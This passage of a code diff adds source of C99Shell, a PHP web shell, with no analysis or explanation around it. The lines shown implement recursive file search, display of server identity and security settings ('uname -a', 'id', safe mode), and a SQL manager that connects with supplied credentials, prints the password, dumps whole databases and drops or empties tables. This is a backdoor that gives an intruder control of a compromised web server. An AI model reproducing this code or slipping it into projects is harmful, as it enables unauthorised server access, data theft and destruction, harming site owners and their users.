+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+}
+echo "<br>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>�&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
